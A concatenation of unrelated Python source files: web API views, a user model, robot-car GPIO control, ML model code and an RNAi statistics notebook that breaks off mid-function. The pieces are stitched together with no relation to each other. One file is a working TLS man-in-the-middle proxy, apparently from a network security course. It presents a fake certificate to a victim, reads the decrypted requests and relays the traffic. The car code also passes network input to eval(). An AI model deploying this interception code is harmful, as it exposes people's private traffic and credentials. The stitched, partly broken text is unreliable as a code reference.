def add(req):
reqobj = {
'session_id': req.POST.get('session_id'),
'app_name': req.POST.get('app_name'),
'app_img_url': req.POST.get('app_img_url'),
'sub_type': req.POST.get('sub_type'),
'bill': req.POST.get('bill'),
'startdate': req.POST.get('startdate'),
'enddate': req.POST.get('enddate'),
}
resobj = {
'is_add': False,
'error_msg': None,
}
try:
session = Session.objects.get(
session_id = reqobj['session_id']
)
except Session.DoesNotExist:
session = None
resobj['error_msg'] = 'Session does not exist'
return JsonResponse(resobj)
user = User.objects.get(email = session.email)
try:
app = Application.objects.get(
app_name = quote(reqobj['app_name'])
)
except Application.DoesNotExist:
app = Application()
app.app_name = quote(reqobj['app_name'])
app.app_img_url = reqobj['app_img_url']
app.save()
try:
subscription = Subscription.objects.get(
email = user.email, app_id = app.app_id
)
resobj['error_msg'] = 'Already subscribed'
return JsonResponse(resobj)
except Subscription.DoesNotExist:
subscription = Subscription()
subscription.app_id = app
subscription.email = user
# TODO: Test sub_type TextChioces .label value later
subscription.sub_type = reqobj['sub_type'][0:1].upper()
subscription.bill = int(reqobj['bill'].replace(',', ''))
subscription.startdate = timestamp_to_date(reqobj['startdate'])
subscription.enddate = timestamp_to_date(reqobj['enddate'])
subscription.created_at = timezone.now()
subscription.save()
try:
subscription_bill = Subscription_Bill.objects.get(
email = user.email, app_id = app.app_id
)
resobj['error_msg'] = 'Already subscribed (bill info)'
return JsonResponse(resobj)
except Subscription_Bill.DoesNotExist:
subscription_bill = Subscription_Bill()
subscription_bill.app_id = app
subscription_bill.email = user
sub_bills = calc_subscription_bill(
reqobj['sub_type'][0:1].upper(),
int(reqobj['bill'].replace(',', ''))
)
subscription_bill.week_bill = sub_bills['week_bill']
subscription_bill.month_bill = sub_bills['month_bill']
subscription_bill.year_bill = sub_bills['year_bill']
subscription_bill.save()
resobj['is_add'] = True
return JsonResponse(resobj)
@csrf_exempt
def get(req):
reqobj = {
'session_id': req.POST.get('session_id'),
}
resobj = {
'is_get': False,
'error_msg': None,
'subscriptions': [],
}
try:
session = Session.objects.get(
session_id = reqobj['session_id']
)
except Session.DoesNotExist:
reqobj['error_msg'] = 'Session does not exist'
return JsonResponse(resobj)
qs_subscriptions = Subscription.objects.filter(
email = session.email
)
for sub_info in qs_subscriptions:
try:
app = Application.objects.get(app_id = sub_info.app_id.app_id)
subscription_bill = Subscription_Bill.objects.get(
email = session.email, app_id = sub_info.app_id
)
sub_type_index = sub_info.SubscriptionTypes.values.index(
sub_info.sub_type
)
sub_info_json = {
'app_id': app.app_id,
'app_name': unquote(app.app_name),
'app_img_url': app.app_img_url,
'sub_type': sub_info.sub_type,
'sub_type_label': sub_info.SubscriptionTypes.labels[sub_type_index],
'bill': sub_info.bill,
'startdate': sub_info.startdate,
'enddate': sub_info.enddate,
'week_bill': subscription_bill.week_bill,
'month_bill': subscription_bill.month_bill,
'year_bill': subscription_bill.year_bill,
}
resobj['subscriptions'].append(sub_info_json)
except Application.DoesNotExist:
resobj['error_msg'] = str(app_id) + ' - No such application'
return JsonResponse(resobj)
resobj['is_get'] = True
return JsonResponse(resobj)
@csrf_exempt
def update(req):
reqobj = {
'session_id': req.POST.get('session_id'),
'app_id': req.POST.get('app_id'),
'app_name': req.POST.get('app_name'),
'app_img_url': req.POST.get('app_img_url'),
'sub_type': req.POST.get('sub_type'),
'bill': req.POST.get('bill'),
'startdate': req.POST.get('startdate'),
'enddate': req.POST.get('enddate'),
}
resobj = {
'is_update': False,
'error_msg': None,
}
try:
session = Session.objects.get(session_id = reqobj['session_id'])
app = Application.objects.get(app_id = reqobj['app_id'])
subscription = Subscription.objects.get(
email = session.email, app_id = app.app_id
)
subscription_bill = Subscription_Bill.objects.get(
email = session.email, app_id = app.app_id
)
subscription.sub_type = reqobj['sub_type'][0:1].upper()
subscription.bill = int(reqobj['bill'].replace(',', ''))
subscription.startdate = timestamp_to_date(reqobj['startdate'])
subscription.enddate = timestamp_to_date(reqobj['enddate'])
sub_bills = calc_subscription_bill(
subscription.sub_type,
subscription.bill
)
subscription_bill.week_bill = sub_bills['week_bill']
subscription_bill.month_bill = sub_bills['month_bill']
subscription_bill.year_bill = sub_bills['year_bill']
subscription.save()
subscription_bill.save()
except Session.DoesNotExist:
resobj['error_msg'] = 'Session does not exist'
return JsonResponse(resobj)
except Application.DoesNotExist:
resobj['error_msg'] = 'Application is not subscribed'
return JsonResponse(resobj)
resobj['is_update'] = True
return JsonResponse(resobj)
@csrf_exempt
def delete(req):
reqobj = {
'session_id': req.POST.get('session_id'),
'app_id': req.POST.get('app_id'),
}
resobj = {
'is_delete': False,
'error_msg': None,
}
try:
session = Session.objects.get(
session_id = reqobj['session_id']
)
app = Application.objects.get(
app_id = reqobj['app_id']
)
subscription = Subscription.objects.get(
email = session.email,
app_id = app.app_id
)
subscription_bill = Subscription_Bill.objects.get(
email = session.email,
app_id = app.app_id
)
# TODO Check constraint for email attribute
app.delete()
subscription.delete()
subscription_bill.delete()
except Session.DoesNotExist:
reqobj['error_msg'] = 'Session does not exist'
return JsonResponse(resobj)
except Application.DoesNotExist:
resobj['error_msg'] = 'The application is not subscribed'
return JsonResponse(resobj)
resobj['is_delete'] = True
return JsonResponse(resobj)
def applist(req):
resobj = {
'is_applist': False,
'error_msg': None,
'applist': None,
}
res = requests.get(APP_LIST_URL)
if res is not None:
if res.text is not None:
resobj['is_applist'] = True
resobj['applist'] = json.loads(res.text)
else:
resobj['error_msg'] = 'App List cannot be fetched'
return JsonResponse(resobj)
|
def fibonacci(n):
if n == 0:
return 0
if n == 1:
return 1
num1 = fibonacci(n - 1)
num2 = fibonacci(n- 2)
return num1 + num2
fib_list = []
for i in range(0, 11):
fib_list.append(fibonacci(i))
print(fib_list) |
from flask import Blueprint, request, stream_with_context
from aleph.model import Match, Audit
from aleph.logic.audit import record_audit
from aleph.views.util import get_db_collection, jsonify, stream_csv
from aleph.search import QueryParser, DatabaseQueryResult
from aleph.serializers import MatchSchema, MatchCollectionsSchema
from aleph.serializers.xref import XrefSchema
from aleph.logic.xref import xref_collection, export_matches_csv
from aleph.views.util import parse_request
blueprint = Blueprint('xref_api', __name__)
@blueprint.route('/api/2/collections/<int:id>/xref', methods=['GET'])
def index(id):
collection = get_db_collection(id)
record_audit(Audit.ACT_COLLECTION, id=collection.id)
parser = QueryParser(request.args, request.authz)
q = Match.group_by_collection(collection.id, authz=request.authz)
result = DatabaseQueryResult(request, q,
parser=parser,
schema=MatchCollectionsSchema)
return jsonify(result)
@blueprint.route('/api/2/collections/<int:id>/xref/<int:other_id>',
methods=['GET'])
def matches(id, other_id):
collection = get_db_collection(id)
record_audit(Audit.ACT_COLLECTION, id=collection.id)
other = get_db_collection(other_id)
record_audit(Audit.ACT_COLLECTION, id=other.id)
parser = QueryParser(request.args, request.authz)
q = Match.find_by_collection(collection.id, other.id)
result = DatabaseQueryResult(request, q,
parser=parser,
schema=MatchSchema)
return jsonify(result)
@blueprint.route('/api/2/collections/<int:id>/xref', methods=['POST'])
def generate(id):
data = parse_request(XrefSchema)
collection = get_db_collection(id, request.authz.WRITE)
against_ids = data.get("against_collection_ids")
xref_collection.apply_async([collection.id], kwargs={"against_collection_ids": against_ids}, priority=5)
return jsonify({'status': 'accepted'}, status=202)
@blueprint.route('/api/2/collections/<int:id>/xref.csv')
def csv_export(id):
collection = get_db_collection(id, request.authz.READ)
record_audit(Audit.ACT_COLLECTION, id=id)
matches = export_matches_csv(collection.id, request.authz)
return stream_csv(stream_with_context(matches))
|
"""
byceps.services.user.dbmodels.user
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from datetime import datetime
from typing import Optional
from sqlalchemy.ext.associationproxy import association_proxy
from ....database import db, generate_uuid
from ....util.instances import ReprBuilder
from ...user_avatar.dbmodels import AvatarSelection
class User(db.Model):
"""A user."""
__tablename__ = 'users'
id = db.Column(db.Uuid, default=generate_uuid, primary_key=True)
created_at = db.Column(db.DateTime, nullable=False)
screen_name = db.Column(db.UnicodeText, unique=True, nullable=True)
email_address = db.Column(db.UnicodeText, unique=True, nullable=True)
email_address_verified = db.Column(db.Boolean, default=False, nullable=False)
initialized = db.Column(db.Boolean, default=False, nullable=False)
suspended = db.Column(db.Boolean, default=False, nullable=False)
deleted = db.Column(db.Boolean, default=False, nullable=False)
locale = db.Column(db.UnicodeText, nullable=True)
legacy_id = db.Column(db.UnicodeText, nullable=True)
avatar = association_proxy('avatar_selection', 'avatar',
creator=lambda avatar:
AvatarSelection(None, avatar.id))
def __init__(
self,
created_at: datetime,
screen_name: Optional[str],
email_address: Optional[str],
*,
locale: Optional[str] = None,
legacy_id: Optional[str] = None,
) -> None:
self.created_at = created_at
self.screen_name = screen_name
self.email_address = email_address
self.locale = locale
self.legacy_id = legacy_id
@property
def avatar_url(self) -> Optional[str]:
avatar = self.avatar
return avatar.url if (avatar is not None) else None
def __eq__(self, other) -> bool:
return (other is not None) and (self.id == other.id)
def __hash__(self) -> int:
if self.id is None:
raise ValueError(
'User instance is unhashable because its id is None.'
)
return hash(self.id)
def __repr__(self) -> str:
return ReprBuilder(self) \
.add_with_lookup('id') \
.add_with_lookup('screen_name') \
.build()
|
from socket import *
import RPi.GPIO as GPIO
print "Self-Driving Car Motor Module"
GPIO.setmode(GPIO.BCM)
#Signal pin defination
GPIO.setmode(GPIO.BCM)
#LED port defination
LED0 = 10
LED1 = 9
LED2 = 25
#Morot drive port defination
ENA = 13 #//L298 Enalbe A
ENB = 20 #//L298 Enable B
IN1 = 19 #//Motor port 1
IN2 = 16 #//Motor port 2
IN3 = 21 #//Motor port 3
IN4 = 26 #//Motor port 4
#Servo port defination
SER1 = 11 #Servo1
SER2 = 8 #Servo2
SER3 = 7 #Servo3
SER4 = 5 #Servo4
SER7 = 6 #Vertical servo port servo7
SER8 = 12 #Horizontal servo port servo8
#Ultrasonic port defination
ECHO = 4 #Ultrasonic receiving foot position
TRIG = 17 #Ultrasonic sending foot position
#Infrared sensor port defination
IR_R = 18 #Right line following infrared sensor
IR_L = 27 #Left line following infrared sensor
IR_M = 22 #Middle obstacle avoidance infrared sensor
IRF_R = 23 #Right object tracking infrared sensror
IRF_L = 24 #Left object tracking infrardd sensor
global Cruising_Flag
Cruising_Flag = 0 #//Current circulation mode
global Pre_Cruising_Flag
Pre_Cruising_Flag = 0 #//Precycling mode
Left_Speed_Hold = 255 #//Define left speed variable
Right_Speed_Hold = 255 #//Define right speed variable
#Pin type setup and initialization
GPIO.setwarnings(False)
#led initialized to 000
GPIO.setup(LED0,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(LED1,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(LED2,GPIO.OUT,initial=GPIO.HIGH)
#motor initialized to LOW
GPIO.setup(ENA,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN1,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN2,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(ENB,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN3,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN4,GPIO.OUT,initial=GPIO.LOW)
#Servo pin type set
GPIO.setup(SER1,GPIO.OUT)#Servo1
GPIO.setup(SER2,GPIO.OUT)#Servo2
GPIO.setup(SER3,GPIO.OUT)#Servo3
GPIO.setup(SER4,GPIO.OUT)#Servo4
GPIO.setup(SER7,GPIO.OUT)#Horizontal servo port servo7
GPIO.setup(SER8,GPIO.OUT)#Vertical servo port servo8
Servo7=GPIO.PWM(SER7,50) #50HZ
Servo7.start(90)
Servo8=GPIO.PWM(SER8,50) #50HZ
Servo8.start(90)
# Motor Control
def Motor_Forward():
print 'motor forward'
GPIO.output(ENA,True)
GPIO.output(ENB,True)
GPIO.output(IN1,True)
GPIO.output(IN2,False)
GPIO.output(IN3,True)
GPIO.output(IN4,False)
GPIO.output(LED1,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,False)#Headlight's anode to 5V, cathode to IO port
def Motor_Backward():
print 'motor_backward'
GPIO.output(ENA,True)
GPIO.output(ENB,True)
GPIO.output(IN1,False)
GPIO.output(IN2,True)
GPIO.output(IN3,False)
GPIO.output(IN4,True)
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,False)#Headlight's anode to 5V, cathode to IO port
def Motor_TurnLeft():
print 'motor_turnleft'
GPIO.output(ENA,True)
GPIO.output(ENB,True)
GPIO.output(IN1,True)
GPIO.output(IN2,False)
GPIO.output(IN3,False)
GPIO.output(IN4,True)
GPIO.output(LED1,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
def Motor_TurnRight():
print 'motor_turnright'
GPIO.output(ENA,True)
GPIO.output(ENB,True)
GPIO.output(IN1,False)
GPIO.output(IN2,True)
GPIO.output(IN3,True)
GPIO.output(IN4,False)
GPIO.output(LED1,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
def Motor_Stop():
print 'motor_stop'
GPIO.output(ENA,False)
GPIO.output(ENB,False)
GPIO.output(IN1,False)
GPIO.output(IN2,False)
GPIO.output(IN3,False)
GPIO.output(IN4,False)
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
#Servo angle drive function
def SetServo7Angle(angle_from_protocol):
angle=hex(eval('0x'+angle_from_protocol))
angle=int(angle,16)
Servo7.ChangeDutyCycle(2.5 + 10 * angle / 180) #set horizontal servo rotation angle
GPIO.output(LED0,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED1,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
time.sleep(0.01)
GPIO.output(LED0,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
def SetServo8Angle(angle_from_protocol):
angle=hex(eval('0x'+angle_from_protocol))
angle=int(angle,16)
Servo8.ChangeDutyCycle(2.5 + 10 * angle / 180) #Set vertical servo rotation angel
GPIO.output(LED0,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,False)#Headlight's anode to 5V, cathode to IO port
time.sleep(0.01)
GPIO.output(LED0,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
|
"""ViT Classification model."""
from scenic.model_lib.base_models.classification_model import ClassificationModel
from scenic.projects.baselines import vit
class ViTClassificationModel(ClassificationModel):
"""ViT model for classification task."""
def build_flax_model(self):
return vit.ViT(
num_classes=self.dataset_meta_data['num_classes'],
mlp_dim=self.config.model.mlp_dim,
num_layers=self.config.model.num_layers,
num_heads=self.config.model.num_heads,
representation_size=self.config.model.representation_size,
patches=self.config.model.patches,
hidden_size=self.config.model.hidden_size,
classifier=self.config.model.classifier,
dropout_rate=self.config.model.get('dropout_rate', 0.1),
attention_dropout_rate=self.config.model.get('attention_dropout_rate',
0.1),
dtype='float32',
)
|
from neuronalnetwork import *
import matplotlib.pyplot as plt
from os.path import isdir
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Mountain Car with a neuronal network')
parser.add_argument(dest='dirname', default="./")
args = parser.parse_args()
print("args:", args)
if isdir(args.dirname):
networks = [args.dirname+f for f in os.listdir(args.dirname) if '.json' in f]
else:
networks = [args.dirname]
for nf in networks:
net = MountainCarNeuronalNetwork(warm_start=nf)
net.display_network(name=nf)
plt.show(block=True)
|
from socket import *
import ssl
import threading
import time
import re
import httplib
import struct
import string
import os
import sys
import socket as Socket
import select
class handler(threading.Thread):
def __init__(self,socket, port) :
threading.Thread.__init__(self)
self.socket=socket
self.client_port = socket.getpeername()[1]
self.default_port = port
# A flag to denote ssl state
self.sslenable = False
def initSSLConnection(self, clientSocket):
# Use your fake certificate to establish connection to victim
# This function should use
# 1. send back "HTTP/1.1 200 Connection established\r\n\r\n"
# 2. use ssl.wrap_socket to establish ssl-wrap socket connect to victim(use fake certificate )
# 3. return the ssl-wrap socket
# ======== Your Code Here!! =======================
clientSocket.send("HTTP/1.1 200 Connection established\r\n\r\n")
wsock = ssl.wrap_socket(clientSocket, "myCA.pem", "myCA.pem", server_side=True, ssl_version=ssl.PROTOCOL_TLS)
return wsock
def CreateSocketAndConnectToOriginDst(self , host, port):
# if the port is not 443(http), create socket dirrect connect to the original website
# if port is 443, create ssl.wrap_socket socket and connect to origin website
# return the socket or wrap socket
# ======== Your Code Here!! =======================
sock = socket()
if self.sslenable == True:
sock = ssl.wrap_socket(sock)
addr = Socket.gethostbyname(host)
print 'connect to server [{} {} {}] from client [{}]'.format(host, addr, port, self.socket.getpeername()[1])
sock.connect((addr, port))
return sock
def ReadLine(self,SourceSock):
# This function read a line from socket
line = ""
while True:
char = SourceSock.recv(1)
line += char
if not line.find("\r\n") == -1 :
return line
def ReadNum(self,SourceSock,length):
# read data with lenth from SourceSock
line = ""
while len(line) < length:
char = SourceSock.recv(1)
line += char
return line
def ReadHeader(self,SourceSock):
#This function read the http header from socket
header = ""
line = SourceSock.recv(1)
data = line
while len(line) :
line = SourceSock.recv(1)
data += line
if not data.find("\r\n\r\n")==-1 :
header = data
data = ""
break;
dicHeader = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", header))
#print dicHeader
#for (k,v) in dicHeader.items():
# print k,":",v
return dicHeader, header
def ReadHttp(self,SourceSock):
# Read whole Http packet, and return header and body in string type
#dicHeader, header = self.ReadHeader(SourceSock)
res = self.ReadHeader(SourceSock)
if not res:
return
dicHeader = res[0]
header = res[1]
body = ""
if 'Transfer-Encoding' in dicHeader and dicHeader['Transfer-Encoding'] == 'chunked' :
line = self.ReadLine(SourceSock)
body += line
chunkSize = int(line,16)
print "chunk size is {}".format(chunkSize)
#while True :
if chunkSize != 0 :
line = self.ReadNum(SourceSock,chunkSize+2)
body += line
else :
if 'Content-Length' in dicHeader :
length = int(dicHeader['Content-Length'])
else :
length = 0
while length>0 :
line = SourceSock.recv(1)
length -= len(line)
body += line
#self.PrinfContent(body)
return header,body
def PrintContent(self,content):
index = 0
part = 0x10
print '[PrintContent]'
while index < len(content) :
length = part if len(content)-index >= part else len(content)-index
print "%08d" % index ,
for i in range(index,index+length):
print content[i:i+2].encode('hex').upper(),
i += 1
print_str=""
for i in range(index,index+length):
if content[i] not in string.printable or content[i] in {'\n','\r','\t'}:
print_str+='.'
else:
print_str+=content[i]
print print_str
index+=length
def getHostFromHeader(self, header):
# Parsing first http packet and find
# 1) if ssl enable, if header contain "CONNECT 192.168.6.131:443 HTTP/1.1"
# then it is https connection, and port and host are return
# 2) port need to connect
# 3) host need to conect
if 'CONNECT' in header:
self.sslenable = True
#print "The header is: "+header
tokens = str(header).split('\r\n')
tokens = tokens[1].split(' ')
host = tokens[1]
if self.sslenable == True:
port = 443
else:
port = 80
return host,port
def simpleRead(self, socket):
return socket.recv(8192)
def run(self):
# The main function for MITM
# You need to do
# 1. read http request sent from victim, and use getHostFromHeader to reveal host and port of target website
# 2. if ssl is enabled, you should use initSSLConnection() to create ssl wrap socket
# 2.1 if ssl is enabled, you should receive the real request from client by ReadHTTP()
# 3. create a fakeSocket and connect to website which victim want to connect
# ==============Your Code Here !! ====================================
request = self.ReadHttp(self.socket)
host,port = self.getHostFromHeader(request[0])
if ("icloud" in host) or ("dropbox" in host) or ("apple" in host):
return
# if ("wiki" not in host) and ("neverssl" not in host):
# print 'return'
# return
#if "facebook" not in host:
# return
if self.sslenable == True:
#try:
self.socket = self.initSSLConnection(self.socket)
request = self.ReadHttp(self.socket)
#host,port = self.getHostFromHeader(request[0])
#except Exception as ex:
# print host
# print ex
print request[0]
#if host.rstrip() != "140.113.207.95":
#print "return!!!!!!!!!!!!!"
#return
rsock = self.CreateSocketAndConnectToOriginDst(host, int(port))
# 4. Forward the request sent by user to the fakeSocket
rsock.sendall(request[0]+request[1])
print "Client [{}] Request Forwarding Success".format(self.client_port)
# 5. Read response from fakeSocket and forward to victim's socket
# 6. close victim's socket and fakeSocket
response = self.ReadHttp(rsock)
print "Server [{}] responded to client [{}]".format(host, self.client_port)
#print "server msg: " + response[0]
#self.PrintContent(response[1])
self.socket.sendall(response[0]+response[1])
print "Server sent"
inputs = [ rsock, self.socket ]
outputs = []
while True:
readable, writable, exceptional = select.select(inputs, outputs, inputs)
for s in readable:
if s is rsock:
raddr = rsock.getsockname()
#print '{0} {1} read server'.format(host, raddr[1])
#rsock.setblocking(True)
#res = self.ReadHttp(s)
res = self.simpleRead(s)
if res:
#self.PrintContent(res)
self.socket.sendall(res)
else:
print 'server [{} {}] close to client [{}]'.format(host, raddr[1], self.client_port)
self.socket.close()
rsock.close()
return
else:
raddr = s.getpeername()
#print '{0} {1} read client'.format(host, raddr[1])
#self.socket.setblocking(True)
#res = self.ReadHttp(self.socket)
res = self.simpleRead(s)
if res:
#rsock.send(res[0] + res[1])
#self.PrintContent(res)
rsock.sendall(res)
else:
print 'server [{} {}] was closed by client [{}]'.format(host, raddr[1], self.client_port)
self.socket.close()
rsock.close()
return
# self.socket.close()
# rsock.close()
print "Connection Finished"
if not len(sys.argv) == 2 :
print "This program is Template of Proxy Level MITM Attack"
print "This program is part of Network Security Project"
print "Usage: python mitm.py <your address> <port>"
ip = sys.argv[1]
port = int(sys.argv[2])
bindAddress = (ip , port)
serverSocket = socket(AF_INET,SOCK_STREAM)
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
serverSocket.bind(bindAddress)
serverSocket.listen(1)
threads = []
data_dir = "/home/netsec/MITM-master/"
while True :
clientSocket,addr = serverSocket.accept()
handler(clientSocket, port).start()
|
class AutoPrep:
def __init__(self, docs):
self.docs = self._format(docs)
self.docs = self._clean()
def _format(self, docs):
# input is a single string
if isinstance(docs, str):
pass
# input is list with strings
if isinstance(docs[0], str):
pass
# input is list with lists
if isinstance(docs[0], list):
pass
def _clean(self):
from signs import Clean
return [[Clean(doc).text] for doc in self.docs]
|
import collections
import warnings
# Our numerical workhorses
import numpy as np
import pandas as pd
import scipy.optimize
import scipy.stats as st
# Numba to make things faster
import numba
# The MCMC Hammer
import emcee
# Numerical differentiation package
import numdifftools as ndt
# Import plotting tools
import matplotlib.pyplot as plt
import seaborn as sns
import corner
# JB's favorite Seaborn settings for notebooks
rc = {'lines.linewidth': 2,
'axes.labelsize': 18,
'axes.titlesize': 18,
'axes.facecolor': 'DFDFE5'}
sns.set_context('notebook', rc=rc)
sns.set_style('darkgrid', rc=rc)
# Suppress future warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
input_path = '../input/rnai_screen_results/'
output_path = '../output/rnai_screen_results/'
df = pd.read_csv(input_path + 'rnai_heat_shock_data.txt', sep='\t')
names = pd.read_csv(input_path + 'rnai_genes_dict.csv')
names.head()
# rename the columns to something handy
df.columns = ['rnai', 'alive', 'dead', 'date']
# make all codes upper or lower, not both
# first make sure each column is a str
names.code = names.code.apply(str)
df.rnai = df.rnai.apply(str)
# now apply lower
names.code = names.code.apply(str.lower)
df.rnai = df.rnai.apply(str.lower)
# extract the names that have been assayed so far
def translate(x):
"""a function to go between rnai code and gene (human-readable) name."""
return names[names.code == x].gene_name.values[0]
df['gene'] = df.rnai.apply(translate)
df.sort_values('gene', inplace=True)
# calculate fraction dead
df['fraction_dead'] = df.dead/(df.alive + df.dead)
# standardize dead values to the mean and stdev of the gfp data
gfp_fr_dead_mu = df.fraction_dead.mean()
gfp_fr_dead_sig = df.fraction_dead.std()
total = (df.dead+df.alive)
df['z_dead'] = (df.dead - total*gfp_fr_dead_mu)/(gfp_fr_dead_sig*total)
# plot in either a swarmplot or boxplot
plot = sns.swarmplot(x='gene', y='fraction_dead', data=df)
plt.xticks(rotation=30)
plt.title('Heat Survival After 24 hours')
plt.savefig(output_path + 'swarmplot_gene_heat_shock_assays.pdf')
plot = sns.swarmplot(x='gene', y='z_dead', data=df)
plt.xticks(rotation=30)
plt.title('Heat Survival After 24 hours')
plt.show()
plot = sns.boxplot(x='gene', y='z_dead', data=df)
plt.xticks(rotation=30)
plt.title('Heat Survival After 24 hours')
plt.ylim(-3, 3)
plt.show()
sns.boxplot(x='gene', y='fraction_dead', data=df)
plt.xticks(rotation=30)
plt.title('Heat Survival After 24 hours')
plt.savefig(output_path + 'boxplot_gene_heat_shock_assays.pdf')
plt.show()
sns.boxplot(x='date', y='fraction_dead', data=df[df.gene == 'gfp'])
plt.xticks(rotation=30)
plt.title('Day-to-Day Variation in Heat Survival After 24 hours')
plt.savefig(output_path + 'boxplot_gene_heat_shock_controls_by_date.pdf')
plt.show()
# first, identify outliers in the data
# in theory, it should be binomial distributed, and since
# we are using a normal approximation
def log_posterior_good_bad(p, x):
"""The log posterior for good/bad data model for repeated measurements."""
# Pull out parameters
mu, sigma, sigma_bad = p[:3]
g = p[3:]
if type(sigma) is list:
raise ValueError('sigma is list')
if type(mu) is not np.float64:
raise ValueError('mu is not float')
if type(sigma) is not np.float64:
raise ValueError('mu is not float')
if type(sigma_bad) is not np.float64:
raise ValueError('mu is not float')
if type(g) is not list:
raise ValueError('g is not list')
# Check to make sure the prior conditions are ok
# if any(i < 0.0 for i in g):
# return -np.inf
# if any(i > 1.0 for i in g):
# return -np.inf
#
# if sigma >= 0:
# return -np.inf
# if sigma_bad < sigma:
# return -np.inf
# log prior
log_prior = -np.log(sigma) - np.log(sigma_bad)
# Add in likelihood
log_like_good = np.log(g / sigma) - ((x - mu) / sigma)**2 / 2.0
log_like_bad = np.log((1.0 - g) / sigma_bad) \
- ((x - mu) / sigma_bad)**2 / 2.0
log_like = np.logaddexp(log_like_good, log_like_bad).sum()
# Return the whole posterior
return log_prior + log_like
# Set up MCMC parameters
n_dim = 3 + len(df[df.gene == 'gfp']) # number of parameters in the model
n_walkers = 200 # number of MCMC walkers
n_burn = 2000 # "burn-in" period to let chains stabilize
n_steps = 5000 # number of MCMC steps to take after burn-in
# Seed random number generator for reproducibility
np.random.seed(42)
# Generate random starting points for walkers.
# p0[i,j] is the starting point for walk i along variable j.
p0 = np.empty((n_walkers, n_dim))
p0[:, 0] = np.random.uniform(10, 30, n_walkers) # mu
p0[:, 1] = np.random.exponential(5.0, n_walkers) # sigma
p0[:, 2] = np.random.exponential(20.0, n_walkers) # sigma_bad
p0[:, 3:] = np.random.uniform(0.0, 1.0, (n_walkers, n_dim-3)) # g_i
# Set up the EnsembleSampler instance
sampler = emcee.EnsembleSampler(n_walkers, n_dim, log_posterior_good_bad,
args=(df[df.gene == 'gfp'].z_dead,),
threads=6)
# Do the burn-in
pos, prob, state = sampler.run_mcmc(p0, n_burn, storechain=False)
# Reset sampler and run from the burn-in state we got to
_ = sampler.run_mcmc(pos, n_steps)
# Get most probable parameter value
max_ind = np.argmax(sampler.flatlnprobability)
mean_goodbad = sampler.flatchain[max_ind, 0]
sigma = sampler.flatchain[max_ind, 1]
# Get the error bar
sem_goodbad = sampler.flatchain[:, 0].std()
# Report results
print("""
Good/bad data model: {0:.2f} ± {1:.2f} sec/10 min
""".format(mean_goodbad, sem_goodbad))
sns.stripplot(y='z_dead', data=df[df.gene == 'gfp'], jitter=True)
plt.plot(plt.gca().get_xlim(), [mean_goodbad, mean_goodbad], '-',
color=sns.color_palette()[1], label='Good/bad')
plt.ylabel('mean activity (sec/10 min)')
plt.legend()
plt.show()
# Compute mean goodness of data
g = sampler.flatchain[:, 3:].mean(axis=0)
# Identify outliers
outliers = (g < g.mean() - 1.7*g.std())
# Make strip plot with outliers in red
sns.stripplot(y='z_dead', data=df[df.gene == 'gfp'][~outliers],
jitter=True)
sns.stripplot(y='z_dead', data=df[df.gene == 'gfp'][outliers],
jitter=True, color=sns.color_palette()[2])
plt.ylabel('mean activity (sec/10 min)')
plt.show()
sigma
np.sqrt(sigma)
corner.corner(sampler.flatchain[:, :3],
labels=[r'$\mu$', r'$\sigma$', r'$\sigma_\mathrm{bad}$'],
bins=100)
plt.show()
# get the number of groups
n_genes_tested = df.gene.unique().shape[0]
# number of tests per group
n = np.array([len(x) for g in df.gene.unique() for x in df[df.gene == g]])
# get the indices of each entry
n = np.array([len(df[df.gene == g]) for g in df.gene.unique()])
n = n.astype(int)
inds = np.concatenate(((0,), n.cumsum()))
z_dead_vals = df.z_dead.values
df.shape
len(inds)
def log_post_hierarchical(params, data, inds, total=df.shape[0]):
if len(data) < 2:
raise ValueError('Too few datapoints to run simulation')
L = len(inds)-1
mu = params[0: L]
sigma = params[L: 2*L]
sigma_bad = params[2*L: 3*L]
G = params[3*L: 4*L]
g = params[4*L:4*L + total]
M = params[-3]
S = params[-2]
S_bad = params[-1]
# cropping
if any(i <= 0 for i in sigma):
return -np.inf
if any(i <= 0 for i in sigma_bad):
return -np.inf
if (sigma_bad < sigma).any():
return -np.inf
if S <= 0:
return -np.inf
if (S_bad <= 0):
return -np.inf
if (S_bad < S):
return - np.inf
if any(i < 0 for i in g):
return -np.inf
if any(i < 0 for i in G):
return -np.inf
if any(i > 1 for i in g):
return -np.inf
if any(i > 1 for i in G):
return -np.inf
# log likelihood calculation
lp = 0
for i, m in enumerate(mu):
# extract data
# fit each parameter
# data for log_posterior_good_bad
x = data[inds[i], inds[i+1]]
gs = g[inds[i]: inds[i+1]]
p = [m, sigma[i], sigma_bad[i], gs]
P = [M, S, S_bad, G[i]]
# print(p[0:3])
print(P[0:3])
print(type(m))
print(type(M))
